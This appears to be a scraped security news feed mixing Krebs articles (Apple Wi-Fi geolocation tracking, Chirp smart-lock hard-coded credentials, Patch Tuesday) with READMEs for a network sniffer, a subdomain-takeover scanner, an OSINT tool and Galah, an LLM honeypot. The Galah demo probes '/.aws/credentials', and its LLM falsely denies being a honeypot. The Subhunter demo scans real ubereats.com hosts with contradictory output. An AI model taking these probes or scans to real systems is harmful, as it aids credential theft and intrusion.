If you already have some recorded traffic, you can use the --input argument to look for potential security issues

caster@kali:~$ above --input ospf-md5.cap

Example:

caster@kali:~$ sudo above --input ospf-md5.cap

[+] Analyzing pcap file...

--------------------------------------------------
[+] Detected OSPF Packet
[+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
[*] Tools: Loki, Scapy, FRRouting
[*] OSPF Area ID: 0.0.0.0
[*] OSPF Neighbor IP: 10.0.0.1
[*] OSPF Neighbor MAC: 00:0c:29:dd:4c:54
[!] Authentication: MD5
[*] Tools for bruteforce: Ettercap, John the Ripper
[*] OSPF Key ID: 1
[*] Mitigation: Enable passive interfaces, use authentication
--------------------------------------------------
[+] Detected OSPF Packet
[+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
[*] Tools: Loki, Scapy, FRRouting
[*] OSPF Area ID: 0.0.0.0
[*] OSPF Neighbor IP: 192.168.0.2
[*] OSPF Neighbor MAC: 00:0c:29:43:7b:fb
[!] Authentication: MD5
[*] Tools for bruteforce: Ettercap, John the Ripper
[*] OSPF Key ID: 1
[*] Mitigation: Enable passive interfaces, use authentication

Passive ARP

The tool can detect hosts without noise in the air by processing ARP frames in passive mode

caster@kali:~$ sudo above --interface eth0 --passive-arp --timer 10

[+] Host discovery using Passive ARP

--------------------------------------------------
[+] Detected ARP Reply
[*] ARP Reply for IP: 192.168.1.88
[*] MAC Address: 00:00:0c:07:ac:c8
--------------------------------------------------
[+] Detected ARP Reply
[*] ARP Reply for IP: 192.168.1.40
[*] MAC Address: 00:0c:29:c5:82:81
--------------------------------------------------

Outro

I wrote this tool because of the track "A View From Above (Remix)" by KOAN Sound. This track was everything to me when I was working on this sniffer.




☐ ☆ ✇ Krebs on Security

Why Your Wi-Fi Router Doubles as an Apple AirTag

By: BrianKrebs — May 21st 2024 at 16:21

Image: Shutterstock.

Apple and the satellite-based broadband service Starlink each recently took steps to address new research into the potential security and privacy implications of how their services geo-locate devices. Researchers from the University of Maryland say they relied on publicly available data from Apple to track the location of billions of devices globally — including non-Apple devices like Starlink systems — and found they could use this data to monitor the destruction of Gaza, as well as the movements and in many cases identities of Russian and Ukrainian troops.

At issue is the way that Apple collects and publicly shares information about the precise location of all Wi-Fi access points seen by its devices. Apple collects this location data to give Apple devices a crowdsourced, low-power alternative to constantly requesting global positioning system (GPS) coordinates.

Both Apple and Google operate their own Wi-Fi-based Positioning Systems (WPS) that obtain certain hardware identifiers from all wireless access points that come within range of their mobile devices. Both record the Media Access Control (MAC) address that a Wi-FI access point uses, known as a Basic Service Set Identifier or BSSID.

Periodically, Apple and Google mobile devices will forward their locations — by querying GPS and/or by using cellular towers as landmarks — along with any nearby BSSIDs. This combination of data allows Apple and Google devices to figure out where they are within a few feet or meters, and it’s what allows your mobile phone to continue displaying your planned route even when the device can’t get a fix on GPS.

With Google’s WPS, a wireless device submits a list of nearby Wi-Fi access point BSSIDs and their signal strengths — via an application programming interface (API) request to Google — whose WPS responds with the device’s computed position. Google’s WPS requires at least two BSSIDs to calculate a device’s approximate position.

Apple’s WPS also accepts a list of nearby BSSIDs, but instead of computing the device’s location based off the set of observed access points and their received signal strengths and then reporting that result to the user, Apple’s API will return the geolocations of up to 400 hundred more BSSIDs that are nearby the one requested. It then uses approximately eight of those BSSIDs to work out the user’s location based on known landmarks.

In essence, Google’s WPS computes the user’s location and shares it with the device. Apple’s WPS gives its devices a large enough amount of data about the location of known access points in the area that the devices can do that estimation on their own.

That’s according to two researchers at the University of Maryland, who theorized they could use the verbosity of Apple’s API to map the movement of individual devices into and out of virtually any defined area of the world. The UMD pair said they spent a month early in their research continuously querying the API, asking it for the location of more than a billion BSSIDs generated at random.

They learned that while only about three million of those randomly generated BSSIDs were known to Apple’s Wi-Fi geolocation API, Apple also returned an additional 488 million BSSID locations already stored in its WPS from other lookups.

UMD Associate Professor David Levin and Ph.D student Erik Rye found they could mostly avoid requesting unallocated BSSIDs by consulting the list of BSSID ranges assigned to specific device manufacturers. That list is maintained by the Institute of Electrical and Electronics Engineers (IEEE), which is also sponsoring the privacy and security conference where Rye is slated to present the UMD research later today.

Plotting the locations returned by Apple’s WPS between November 2022 and November 2023, Levin and Rye saw they had a near global view of the locations tied to more than two billion Wi-Fi access points. The map showed geolocated access points in nearly every corner of the globe, apart from almost the entirety of China, vast stretches of desert wilderness in central Australia and Africa, and deep in the rainforests of South America.

A “heatmap” of BSSIDs the UMD team said they discovered by guessing randomly at BSSIDs.

The researchers said that by zeroing in on or “geofencing” other smaller regions indexed by Apple’s location API, they could monitor how Wi-Fi access points moved over time. Why might that be a big deal? They found that by geofencing active conflict zones in Ukraine, they were able to determine the location and movement of Starlink devices used by both Ukrainian and Russian forces.

The reason they were able to do that is that each Starlink terminal — the dish and associated hardware that allows a Starlink customer to receive Internet service from a constellation of orbiting Starlink satellites — includes its own Wi-Fi access point, whose location is going to be automatically indexed by any nearby Apple devices that have location services enabled.

A heatmap of Starlink routers in Ukraine. Image: UMD.

The University of Maryland team geo-fenced various conflict zones in Ukraine, and identified at least 3,722 Starlink terminals geolocated in Ukraine.

“We find what appear to be personal devices being brought by military personnel into war zones, exposing pre-deployment sites and military positions,” the researchers wrote. “Our results also show individuals who have left Ukraine to a wide range of countries, validating public reports of where Ukrainian refugees have resettled.”

In an interview with KrebsOnSecurity, the UMD team said they found that in addition to exposing Russian troop pre-deployment sites, the location data made it easy to see where devices in contested regions originated from.

“This includes residential addresses throughout the world,” Levin said. “We even believe we can identify people who have joined the Ukraine Foreign Legion.”

A simplified map of where BSSIDs that enter the Donbas and Crimea regions of Ukraine originate. Image: UMD.

Levin and Rye said they shared their findings with Starlink in March 2024, and that Starlink told them the company began shipping software updates in 2023 that force Starlink access points to randomize their BSSIDs.

Starlink’s parent SpaceX did not respond to requests for comment. But the researchers shared a graphic they said was created from their Starlink BSSID monitoring data, which shows that just in the past month there was a substantial drop in the number of Starlink devices that were geo-locatable using Apple’s API.

UMD researchers shared this graphic, which shows their ability to monitor the location and movement of Starlink devices by BSSID dropped precipitously in the past month.

They also shared a written statement they received from Starlink, which acknowledged that Starlink User Terminal routers originally used a static BSSID/MAC:

“In early 2023 a software update was released that randomized the main router BSSID. Subsequent software releases have included randomization of the BSSID of WiFi repeaters associated with the main router. Software updates that include the repeater randomization functionality are currently being deployed fleet-wide on a region-by-region basis. We believe the data outlined in your paper is based on Starlink main routers and or repeaters that were queried prior to receiving these randomization updates.”

The researchers also focused their geofencing on the Israel-Hamas war in Gaza, and were able to track the migration and disappearance of devices throughout the Gaza Strip as Israeli forces cut power to the country and bombing campaigns knocked out key infrastructure.

“As time progressed, the number of Gazan BSSIDs that are geolocatable continued to decline,” they wrote. “By the end of the month, only 28% of the original BSSIDs were still found in the Apple WPS.”

In late March 2024, Apple quietly updated its website to note that anyone can opt out of having the location of their wireless access points collected and shared by Apple — by appending “_nomap” to the end of the Wi-Fi access point’s name (SSID). Adding “_nomap” to your Wi-Fi network name also blocks Google from indexing its location.

Apple updated its privacy and location services policy in March 2024 to allow people to opt out of having their Wi-Fi access point indexed by its service, by appending “_nomap” to the network’s name.

Asked about the changes, Apple said they have respected the “_nomap” flag on SSIDs for some time, but that this was only called out in a support article earlier this year.

Rye said Apple’s response addressed the most depressing aspect of their research: That there was previously no way for anyone to opt out of this data collection.

“You may not have Apple products, but if you have an access point and someone near you owns an Apple device, your BSSID will be in [Apple’s] database,” he said. “What’s important to note here is that every access point is being tracked, without opting in, whether they run an Apple device or not. Only after we disclosed this to Apple have they added the ability for people to opt out.”

The researchers said they hope Apple will consider additional safeguards, such as proactive ways to limit abuses of its location API.

“It’s a good first step,” Levin said of Apple’s privacy update in March. “But this data represents a really serious privacy vulnerability. I would hope Apple would put further restrictions on the use of its API, like rate-limiting these queries to keep people from accumulating massive amounts of data like we did.”

The UMD researchers said they omitted certain details from their study to protect the users they were able to track, noting that the methods they used could present risks for those fleeing abusive relationships or stalkers.

“We observe routers move between cities and countries, potentially representing their owner’s relocation or a business transaction between an old and new owner,” they wrote. “While there is not necessarily a 1-to-1 relationship between Wi-Fi routers and users, home routers typically only have several. If these users are vulnerable populations, such as those fleeing intimate partner violence or a stalker, their router simply being online can disclose their new location.”

The researchers said Wi-Fi access points that can be created using a mobile device’s built-in cellular modem do not create a location privacy risk for their users because mobile phone hotspots will choose a random BSSID when activated.

“Modern Android and iOS devices will choose a random BSSID when you go into hotspot mode,” he said. “Hotspots are already implementing the strongest recommendations for privacy protections. It’s other types of devices that don’t do that.”

For example, they discovered that certain commonly used travel routers compound the potential privacy risks.

“Because travel routers are frequently used on campers or boats, we see a significant number of them move between campgrounds, RV parks, and marinas,” the UMD duo wrote. “They are used by vacationers who move between residential dwellings and hotels. We have evidence of their use by military members as they deploy from their homes and bases to war zones.”

A copy of the UMD research is available here (PDF).

Update, May 22, 4:54 p.m. ET: Added response from Apple.

☐ ☆ ✇ KitPloit - PenTest Tools!

Subhunter - A Fast Subdomain Takeover Tool

By: Zion3R — May 15th 2024 at 12:30


Subdomain takeover is a common vulnerability that allows an attacker to gain control over a subdomain of a target domain and redirect users intended for an organization's domain to a website that performs malicious activities, such as phishing campaigns, stealing user cookies, etc. It occurs when an attacker gains control over a subdomain of a target domain. Typically, this happens when the subdomain has a CNAME in the DNS, but no host is providing content for it. Subhunter takes a given list of Subdomains" title="Subdomains">subdomains and scans them to check this vulnerability.


Features:

  • Auto update
  • Uses random user agents
  • Built in Go
  • Uses a fork of fingerprint data from well known sources (can-i-take-over-xyz)

Installation:

Option 1:

Download from releases

Option 2:

Build from source:

$ git clone https://github.com/Nemesis0U/Subhunter.git
$ go build subhunter.go

Usage:

Options:

Usage of subhunter:
-l string
File including a list of hosts to scan
-o string
File to save results
-t int
Number of threads for scanning (default 50)
-timeout int
Timeout in seconds (default 20)

Demo (Added fake fingerprint for POC):

./Subhunter -l subdomains.txt -o test.txt

____ _ _ _
/ ___| _ _ | |__ | |__ _ _ _ __ | |_ ___ _ __
\___ \ | | | | | '_ \ | '_ \ | | | | | '_ \ | __| / _ \ | '__|
___) | | |_| | | |_) | | | | | | |_| | | | | | | |_ | __/ | |
|____/ \__,_| |_.__/ |_| |_| \__,_| |_| |_| \__| \___| |_|


A fast subdomain takeover tool

Created by Nemesis

Loaded 88 fingerprints for current scan

-----------------------------------------------------------------------------

[+] Nothing found at www.ubereats.com: Not Vulnerable
[+] Nothing found at testauth.ubereats.com: Not Vulnerable
[+] Nothing found at apple-maps-app-clip.ubereats.com: Not Vulnerable
[+] Nothing found at about.ubereats.com: Not Vulnerable
[+] Nothing found at beta.ubereats.com: Not Vulnerable
[+] Nothing found at ewp.ubereats.com: Not Vulnerable
[+] Nothi ng found at edgetest.ubereats.com: Not Vulnerable
[+] Nothing found at guest.ubereats.com: Not Vulnerable
[+] Google Cloud: Possible takeover found at testauth.ubereats.com: Vulnerable
[+] Nothing found at info.ubereats.com: Not Vulnerable
[+] Nothing found at learn.ubereats.com: Not Vulnerable
[+] Nothing found at merchants.ubereats.com: Not Vulnerable
[+] Nothing found at guest-beta.ubereats.com: Not Vulnerable
[+] Nothing found at merchant-help.ubereats.com: Not Vulnerable
[+] Nothing found at merchants-beta.ubereats.com: Not Vulnerable
[+] Nothing found at merchants-staging.ubereats.com: Not Vulnerable
[+] Nothing found at messages.ubereats.com: Not Vulnerable
[+] Nothing found at order.ubereats.com: Not Vulnerable
[+] Nothing found at restaurants.ubereats.com: Not Vulnerable
[+] Nothing found at payments.ubereats.com: Not Vulnerable
[+] Nothing found at static.ubereats.com: Not Vulnerable

Subhunter exiting...
Results written to test.txt




☐ ☆ ✇ KitPloit - PenTest Tools!

Galah - An LLM-powered Web Honeypot Using The OpenAI API

By: Zion3R — April 29th 2024 at 12:30


TL;DR: Galah (/ɡəˈlɑː/ - pronounced 'guh-laa') is an LLM (Large Language Model) powered web honeypot, currently compatible with the OpenAI API, that is able to mimic various applications and dynamically respond to arbitrary HTTP requests.


Description

Named after the clever Australian parrot known for its mimicry, Galah mirrors this trait in its functionality. Unlike traditional web honeypots that rely on a manual and limiting method of emulating numerous web applications or vulnerabilities, Galah adopts a novel approach. This LLM-powered honeypot mimics various web applications by dynamically crafting relevant (and occasionally foolish) responses, including HTTP headers and body content, to arbitrary HTTP requests. Fun fact: in Aussie English, Galah also means fool!

I've deployed a cache for the LLM-generated responses (the cache duration can be customized in the config file) to avoid generating multiple responses for the same request and to reduce the cost of the OpenAI API. The cache stores responses per port, meaning if you probe a specific port of the honeypot, the generated response won't be returned for the same request on a different port.

The prompt is the most crucial part of this honeypot! You can update the prompt in the config file, but be sure not to change the part that instructs the LLM to generate the response in the specified JSON format.

Note: Galah was a fun weekend project I created to evaluate the capabilities of LLMs in generating HTTP messages, and it is not intended for production use. The honeypot may be fingerprinted based on its response time, non-standard, or sometimes weird responses, and other network-based techniques. Use this tool at your own risk, and be sure to set usage limits for your OpenAI API.

Future Enhancements

  • Rule-Based Response: The new version of Galah will employ a dynamic, rule-based approach, adding more control over response generation. This will further reduce OpenAI API costs and increase the accuracy of the generated responses.

  • Response Database: It will enable you to generate and import a response database. This ensures the honeypot only turns to the OpenAI API for unknown or new requests. I'm also working on cleaning up and sharing my own database.

  • Support for Other LLMs.

Getting Started

  • Ensure you have Go version 1.20+ installed.
  • Create an OpenAI API key from here.
  • If you want to serve over HTTPS, generate TLS certificates.
  • Clone the repo and install the dependencies.
  • Update the config.yaml file.
  • Build and run the Go binary!
% git clone git@github.com:0x4D31/galah.git
% cd galah
% go mod download
% go build
% ./galah -i en0 -v

██████ █████ ██ █████ ██ ██
██ ██ ██ ██ ██ ██ ██ ██
██ ███ ███████ ██ ███████ ███████
██ ██ ██ ██ ██ ██ ██ ██ ██
██████ ██ ██ ███████ ██ ██ ██ ██
llm-based web honeypot // version 1.0
author: Adel "0x4D31" Karimi

2024/01/01 04:29:10 Starting HTTP server on port 8080
2024/01/01 04:29:10 Starting HTTP server on port 8888
2024/01/01 04:29:10 Starting HTTPS server on port 8443 with TLS profile: profile1_selfsigned
2024/01/01 04:29:10 Starting HTTPS server on port 443 with TLS profile: profile1_selfsigned

2024/01/01 04:35:57 Received a request for "/.git/config" from [::1]:65434
2024/01/01 04:35:57 Request cache miss for "/.git/config": Not found in cache
2024/01/01 04:35:59 Generated HTTP response: {"Headers": {"Content-Type": "text/plain", "Server": "Apache/2.4.41 (Ubuntu)", "Status": "403 Forbidden"}, "Body": "Forbidden\nYou don't have permission to access this resource."}
2024/01/01 04:35:59 Sending the crafted response to [::1]:65434

^C2024/01/01 04:39:27 Received shutdown signal. Shutting down servers...
2024/01/01 04:39:27 All servers shut down gracefully.

Example Responses

Here are some example responses:

Example 1

% curl http://localhost:8080/login.php
<!DOCTYPE html><html><head><title>Login Page</title></head><body><form action='/submit.php' method='post'><label for='uname'><b>Username:</b></label><br><input type='text' placeholder='Enter Username' name='uname' required><br><label for='psw'><b>Password:</b></label><br><input type='password' placeholder='Enter Password' name='psw' required><br><button type='submit'>Login</button></form></body></html>

JSON log record:

{"timestamp":"2024-01-01T05:38:08.854878","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"51978","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/login.php","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Content-Type":"text/html","Server":"Apache/2.4.38"},"body":"\u003c!DOCTYPE html\u003e\u003chtml\u003e\u003chead\u003e\u003ctitle\u003eLogin Page\u003c/title\u003e\u003c/head\u003e\u003cbody\u003e\u003cform action='/submit.php' method='post'\u003e\u003clabel for='uname'\u003e\u003cb\u003eUsername:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='text' placeholder='Enter Username' name='uname' required\u003e\u003cbr\u003e\u003clabel for='psw'\u003e\u003cb\u003ePassword:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='password' placeholder='Enter Password' name='psw' required\u003e\u003cbr\u003e\u003cbutton type='submit'\u003eLogin\u003c/button\u003e\u003c/form\u003e\u003c/body\u003e\u003c/html\u003e"}}

Example 2

% curl http://localhost:8080/.aws/credentials
[default]
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
region = us-west-2

JSON log record:

{"timestamp":"2024-01-01T05:40:34.167361","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"65311","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/.aws/credentials","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Encoding":"gzip","Content-Length":"126","Content-Type":"text/plain","Server":"Apache/2.4.51 (Unix)"},"body":"[default]\naws_access_key_id = AKIAIOSFODNN7EXAMPLE\naws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\nregion = us-west-2"}}

Okay, that was impressive!

Example 3

Now, let's do some sort of adversarial testing!

% curl http://localhost:8888/are-you-a-honeypot
No, I am a server.`

JSON log record:

{"timestamp":"2024-01-01T05:50:43.792479","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"61982","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/are-you-a-honeypot","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Length":"20","Content-Type":"text/plain","Server":"Apache/2.4.41 (Ubuntu)"},"body":"No, I am a server."}}

😑

% curl http://localhost:8888/i-mean-are-you-a-fake-server`
No, I am not a fake server.

JSON log record:

{"timestamp":"2024-01-01T05:51:40.812831","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"62205","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/i-mean-are-you-a-fake-server","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Type":"text/plain","Server":"LocalHost/1.0"},"body":"No, I am not a fake server."}}

You're a galah, mate!



☐ ☆ ✇ The Hacker News

How to Conduct Advanced Static Analysis in a Malware Sandbox

By: The Hacker News — April 18th 2024 at 10:31
Sandboxes are synonymous with dynamic malware analysis. They help to execute malicious files in a safe virtual environment and observe their behavior. However, they also offer plenty of value in terms of static analysis. See these five scenarios where a sandbox can prove to be a useful tool in your investigations. Detecting Threats in PDFs PDF files are frequently exploited by threat actors to
☐ ☆ ✇ Krebs on Security

Crickets from Chirp Systems in Smart Lock Key Leak

By: BrianKrebs — April 15th 2024 at 14:51

The U.S. government is warning that “smart locks” securing entry to an estimated 50,000 dwellings nationwide contain hard-coded credentials that can be used to remotely open any of the locks. The lock’s maker Chirp Systems remains unresponsive, even though it was first notified about the critical weakness in March 2021. Meanwhile, Chirp’s parent company, RealPage, Inc., is being sued by multiple U.S. states for allegedly colluding with landlords to illegally raise rents.

On March 7, 2024, the U.S. Cybersecurity & Infrastructure Security Agency (CISA) warned about a remotely exploitable vulnerability with “low attack complexity” in Chirp Systems smart locks.

“Chirp Access improperly stores credentials within its source code, potentially exposing sensitive information to unauthorized access,” CISA’s alert warned, assigning the bug a CVSS (badness) rating of 9.1 (out of a possible 10). “Chirp Systems has not responded to requests to work with CISA to mitigate this vulnerability.”

Matt Brown, the researcher CISA credits with reporting the flaw, is a senior systems development engineer at Amazon Web Services. Brown said he discovered the weakness and reported it to Chirp in March 2021, after the company that manages his apartment building started using Chirp smart locks and told everyone to install Chirp’s app to get in and out of their apartments.

“I use Android, which has a pretty simple workflow for downloading and decompiling the APK apps,” Brown told KrebsOnSecurity. “Given that I am pretty picky about what I trust on my devices, I downloaded Chirp and after decompiling, found that they were storing passwords and private key strings in a file.”

Using those hard-coded credentials, Brown found an attacker could then connect to an application programming interface (API) that Chirp uses which is managed by smart lock vendor August.com, and use that to enumerate and remotely lock or unlock any door in any building that uses the technology.

Update, April 18, 11:55 a.m. ET: August has provided a statement saying it does not believe August or Yale locks are vulnerable to the hack described by Brown.

“We were recently made aware of a vulnerability disclosure regarding access control systems provided by Chirp, using August and Yale locks in multifamily housing,” the company said. “Upon learning of these reports, we immediately and thoroughly investigated these claims. Our investigation found no evidence that would substantiate the vulnerability claims in either our product or Chirp’s as it relates to our systems.”

Update, April 25, 2:45 p.m. ET: Based on feedback from Chirp, CISA has downgraded the severity of this flaw and revised their security advisory to say that the hard-coded credentials do not appear to expose the devices to remote locking or unlocking. CISA says the hardcoded credentials could be used by an attacker within the range of Bluetooth (~30 meters) “to change the configuration settings within the Bluetooth beacon, effectively removing Bluetooth visibility from the device. This does not affect the device’s ability to lock or unlock access points, and access points can still be operated remotely by unauthorized users via other means.”

Brown said when he complained to his leasing office, they sold him a small $50 key fob that uses Near-Field Communications (NFC) to toggle the lock when he brings the fob close to his front door. But he said the fob doesn’t eliminate the ability for anyone to remotely unlock his front door using the exposed credentials and the Chirp mobile app.

Also, the fobs pass the credentials to his front door over the air in plain text, meaning someone could clone the fob just by bumping against him with a smartphone app made to read and write NFC tags.

Neither August nor Chirp Systems responded to requests for comment. It’s unclear exactly how many apartments and other residences are using the vulnerable Chirp locks, but multiple articles about the company from 2020 state that approximately 50,000 units use Chirp smart locks with August’s API.

Roughly a year before Brown reported the flaw to Chirp Systems, the company was bought by RealPage, a firm founded in 1998 as a developer of multifamily property management and data analytics software. In 2021, RealPage was acquired by the private equity giant Thoma Bravo.

Brown said the exposure he found in Chirp’s products is “an obvious flaw that is super easy to fix.”

“It’s just a matter of them being motivated to do it,” he said. “But they’re part of a private equity company now, so they’re not answerable to anybody. It’s too bad, because it’s not like residents of [the affected] properties have another choice. It’s either agree to use the app or move.”

In October 2022, an investigation by ProPublica examined RealPage’s dominance in the rent-setting software market, and that it found “uses a mysterious algorithm to help landlords push the highest possible rents on tenants.”

“For tenants, the system upends the practice of negotiating with apartment building staff,” ProPublica found. “RealPage discourages bargaining with renters and has even recommended that landlords in some cases accept a lower occupancy rate in order to raise rents and make more money. One of the algorithm’s developers told ProPublica that leasing agents had ‘too much empathy’ compared to computer generated pricing.”

Last year, the U.S. Department of Justice threw its weight behind a massive lawsuit filed by dozens of tenants who are accusing the $9 billion apartment software company of helping landlords collude to inflate rents.

In February 2024, attorneys general for Arizona and the District of Columbia sued RealPage, alleging RealPage’s software helped create a rental monopoly.

☐ ☆ ✇ KitPloit - PenTest Tools!

Skytrack - Planespotting And Aircraft OSINT Tool Made Using Python

By: Zion3R — March 22nd 2024 at 11:30

About

skytrack is a command-line based plane spotting and aircraft OSINT reconnaissance tool made using Python. It can gather aircraft information using various data sources, generate a PDF report for a specified aircraft, and convert between ICAO and Tail Number designations. Whether you are a hobbyist plane spotter or an experienced aircraft analyst, skytrack can help you identify and enumerate aircraft for general purpose reconnaissance.


What is Planespotting & Aircraft OSINT?

Planespotting is the art of tracking down and observing aircraft. While planespotting mostly consists of photography and videography of aircraft, aircraft information gathering and OSINT is a crucial step in the planespotting process. OSINT (Open Source Intelligence) describes a methodology of using publicy accessible data sources to obtain data about a specific subject — in this case planes!

Aircraft Information

  • Tail Number 🛫
  • Aircraft Type ⚙️
  • ICAO24 Designation 🔎
  • Manufacturer Details 🛠
  • Flight Logs 📄
  • Aircraft Owner ✈️
  • Model 🛩
  • Much more!

Usage

To run skytrack on your machine, follow the steps below:

$ git clone https://github.com/ANG13T/skytrack
$ cd skytrack
$ pip install -r requirements.txt
$ python skytrack.py

skytrack works best for Python version 3.

Preview

Features

skytrack features three main functions for aircraft information

gathering and display options. They include the following:

Aircraft Reconnaissance & OSINT

skytrack obtains general information about the aircraft given its tail number or ICAO designator. The tool sources this information using several reliable data sets. Once the data is collected, it is displayed in the terminal within a table layout.

PDF Aircraft Information Report

skytrack also enables you the save the collected aircraft information into a PDF. The PDF includes all the aircraft data in a visual layout for later reference. The PDF report will be entitled "skytrack_report.pdf"

Tail Number to ICAO Converter

There are two standard identification formats for specifying aircraft: Tail Number and ICAO Designation. The tail number (aka N-Number) is an alphanumerical ID starting with the letter "N" used to identify aircraft. The ICAO type designation is a six-character fixed-length ID in the hexadecimal format. Both standards are highly pertinent for aircraft

reconnaissance as they both can be used to search for a specific aircraft in data sources. However, converting them from one format to another can be rather cumbersome as it follows a tricky algorithm. To streamline this process, skytrack includes a standard converter.

Further Explanation

ICAO and Tail Numbers follow a mapping system like the following:

ICAO address N-Number (Tail Number)

a00001 N1

a00002 N1A

a00003 N1AA

You can learn more about aircraft registration numbers [here](https://www.faa.gov/licenses_certificates/aircraft_certification/aircraft_registry/special_nnumbers)

:warning: Converter only works for USA-registered aircraft

Data Sources & APIs Used

ICAO Aircraft Type Designators Listings

FlightAware

Wikipedia

Aviation Safety Website

Jet Photos Website

OpenSky API

Aviation Weather METAR

Airport Codes Dataset

Contributing

skytrack is open to any contributions. Please fork the repository and make a pull request with the features or fixes you want to implement.

Upcoming

  • Obtain Latest Flown Airports
  • Obtain Airport Information
  • Obtain ATC Frequency Information

Support

If you enjoyed skytrack, please consider becoming a sponsor or donating on buymeacoffee in order to fund my future projects.

To check out my other works, visit my GitHub profile.



☐ ☆ ✇ Krebs on Security

Patch Tuesday, March 2024 Edition

By: BrianKrebs — March 12th 2024 at 20:36

Apple and Microsoft recently released software updates to fix dozens of security holes in their operating systems. Microsoft today patched at least 60 vulnerabilities in its Windows OS. Meanwhile, Apple’s new macOS Sonoma addresses at least 68 security weaknesses, and its latest update for iOS fixes two zero-day flaws.

Last week, Apple pushed out an urgent software update to its flagship iOS platform, warning that there were at least two zero-day exploits for vulnerabilities being used in the wild (CVE-2024-23225 and CVE-2024-23296). The security updates are available in iOS 17.4, iPadOS 17.4, and iOS 16.7.6.

Apple’s macOS Sonoma 14.4 Security Update addresses dozens of security issues. Jason Kitka, chief information security officer at Automox, said the vulnerabilities patched in this update often stem from memory safety issues, a concern that has led to a broader industry conversation about the adoption of memory-safe programming languages [full disclosure: Automox is an advertiser on this site].

On Feb. 26, 2024, the Biden administration issued a report that calls for greater adoption of memory-safe programming languages. On Mar. 4, 2024, Google published Secure by Design, which lays out the company’s perspective on memory safety risks.

Mercifully, there do not appear to be any zero-day threats hounding Windows users this month (at least not yet). Satnam Narang, senior staff research engineer at Tenable, notes that of the 60 CVEs in this month’s Patch Tuesday release, only six are considered “more likely to be exploited” according to Microsoft.

Those more likely to be exploited bugs are mostly “elevation of privilege vulnerabilities” including CVE-2024-26182 (Windows Kernel), CVE-2024-26170 (Windows Composite Image File System (CimFS), CVE-2024-21437 (Windows Graphics Component), and CVE-2024-21433 (Windows Print Spooler).

Narang highlighted CVE-2024-21390 as a particularly interesting vulnerability in this month’s Patch Tuesday release, which is an elevation of privilege flaw in Microsoft Authenticator, the software giant’s app for multi-factor authentication. Narang said a prerequisite for an attacker to exploit this flaw is to already have a presence on the device either through malware or a malicious application.

“If a victim has closed and re-opened the Microsoft Authenticator app, an attacker could obtain multi-factor authentication codes and modify or delete accounts from the app,” Narang said. “Having access to a target device is bad enough as they can monitor keystrokes, steal data and redirect users to phishing websites, but if the goal is to remain stealth, they could maintain this access and steal multi-factor authentication codes in order to login to sensitive accounts, steal data or hijack the accounts altogether by changing passwords and replacing the multi-factor authentication device, effectively locking the user out of their accounts.”

CVE-2024-21334 earned a CVSS (danger) score of 9.8 (10 is the worst), and it concerns a weakness in Open Management Infrastructure (OMI), a Linux-based cloud infrastructure in Microsoft Azure. Microsoft says attackers could connect to OMI instances over the Internet without authentication, and then send specially crafted data packets to gain remote code execution on the host device.

CVE-2024-21435 is a CVSS 8.8 vulnerability in Windows OLE, which acts as a kind of backbone for a great deal of communication between applications that people use every day on Windows, said Ben McCarthy, lead cybersecurity engineer at Immersive Labs.

“With this vulnerability, there is an exploit that allows remote code execution, the attacker needs to trick a user into opening a document, this document will exploit the OLE engine to download a malicious DLL to gain code execution on the system,” Breen explained. “The attack complexity has been described as low meaning there is less of a barrier to entry for attackers.”

A full list of the vulnerabilities addressed by Microsoft this month is available at the SANS Internet Storm Center, which breaks down the updates by severity and urgency.

Finally, Adobe today issued security updates that fix dozens of security holes in a wide range of products, including Adobe Experience Manager, Adobe Premiere Pro, ColdFusion 2023 and 2021, Adobe Bridge, Lightroom, and Adobe Animate. Adobe said it is not aware of active exploitation against any of the flaws.

By the way, Adobe recently enrolled all of its Acrobat users into a “new generative AI feature” that scans the contents of your PDFs so that its new “AI Assistant” can  “understand your questions and provide responses based on the content of your PDF file.” Adobe provides instructions on how to disable the AI features and opt out here.

☐ ☆ ✇ KitPloit - PenTest Tools!

